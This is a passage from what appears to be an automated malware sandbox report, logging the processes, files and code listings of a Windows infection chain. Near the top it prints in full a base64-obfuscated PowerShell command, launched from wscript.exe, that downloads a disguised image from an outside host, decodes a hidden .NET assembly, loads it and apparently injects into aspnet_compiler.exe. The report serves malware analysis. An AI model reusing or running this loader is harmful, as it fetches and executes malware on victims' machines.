')))"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $cyclooctadiene = 'JGhpY2N1cHBpbmcgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskcHJpbXBpbmcgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRtb3ZpbmdzID0gJHByaW1waW5nLkRvd25sb2FkRGF0YSgkaGljY3VwcGluZyk7JGFuc2VyZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkbW92aW5ncyk7JGZsdXR0ZXJieSA9ICc8PEJBU0U2NF9TVEFSVD4+JzskaGFta2luID0gJzw8QkFTRTY0X0VORD4+JzskdW5ncmlldmluZyA9ICRhbnNlcmVzLkluZGV4T2YoJGZsdXR0ZXJieSk7JGNvbnRyYXZlbmVyID0gJGFuc2VyZXMuSW5kZXhPZigkaGFta2luKTskdW5ncmlldmluZyAtZ2UgMCAtYW5kICRjb250cmF2ZW5lciAtZ3QgJHVuZ3JpZXZpbmc7JHVuZ3JpZXZpbmcgKz0gJGZsdXR0ZXJieS5MZW5ndGg7JHNub3dtb2JpbGUgPSAkY29udHJhdmVuZXIgLSAkdW5ncmlldmluZzskd2hvcnRsZSA9ICRhbnNlcmVzLlN1YnN0cmluZygkdW5ncmlldmluZywgJHNub3dtb2JpbGUpOyRyZXZlYWxlZCA9IC1qb2luICgkd2hvcnRsZS5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkd2hvcnRsZS5MZW5ndGgpXTskbWFza2luZyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHJldmVhbGVkKTskdHJhbnNvY2VhbmljID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkbWFza2luZyk7JFRoYXRjaGVyaXNlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JFRoYXRjaGVyaXNlLkludm9rZSgkbnVsbCwgQCgnMC8xTDJ0ZS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJHRob21zb25pYW5pc20nLCAnJHRob21zb25pYW5pc20nLCAnJHRob21zb25pYW5pc20nLCAnYXNwbmV0X2NvbXBpbGVyJywgJyR0aG9tc29uaWFuaXNtJywgJyR0aG9tc29uaWFuaXNtJywnJHRob21zb25pYW5pc20nLCckdGhvbXNvbmlhbmlzbScsJyR0aG9tc29uaWFuaXNtJywnJHRob21zb25pYW5pc20nLCckdGhvbXNvbmlhbmlzbScsJzEnLCckdGhvbXNvbmlhbmlzbScsJycpKTs=';$italicizing = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($cyclooctadiene));Invoke-Expression $italicizing	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zl2mzrqp\zl2mzrqp.cmdline"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zl2mzrqp\zl2mzrqp.cmdline"			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00407041 push cs; iretd	11_2_00407042
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_0041705E push edi; iretd	11_2_00417060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_004030F0 push eax; ret	11_2_004030F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_0041C8FC push cs; iretd	11_2_0041C8C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00401949 push 63DCA26Ah; ret	11_2_0040194E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_0040214B push edx; retf	11_2_0040214E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00402101 push ebp; iretd	11_2_0040210D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_0040210E push eax; retf	11_2_0040214A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_004021A4 push eax; retf	11_2_0040214A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_0041125B pushfd ; ret	11_2_0041125E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_004242D9 push esp; ret	11_2_00424330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_004242E3 push esp; ret	11_2_00424330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00401AB8 push edx; retf	11_2_00401AE3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00413416 push ecx; iretd	11_2_00413417
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_0041ECDC push ds; iretd	11_2_0041ECDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00401DF5 push ebp; iretd	11_2_00401DB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00401DA6 push ebp; iretd	11_2_00401DB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00416EAA push esp; retf	11_2_00416EAB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00401F0D push eax; retf	11_2_00401F19
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00401FEB push edx; retf	11_2_00401FEC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00410FEE push ebp; iretd	11_2_00411000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00410FF3 push ebp; iretd	11_2_00411000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00401FA4 push edx; ret	11_2_00401FAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00401FBA push 0000006Ah; iretd	11_2_00401FC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 11_2_00F109AD push ecx; mov dword ptr [esp], ecx	11_2_00F109B6

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

File created: C:\Users\user\AppData\Local\Temp\zl2mzrqp\zl2mzrqp.dll

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
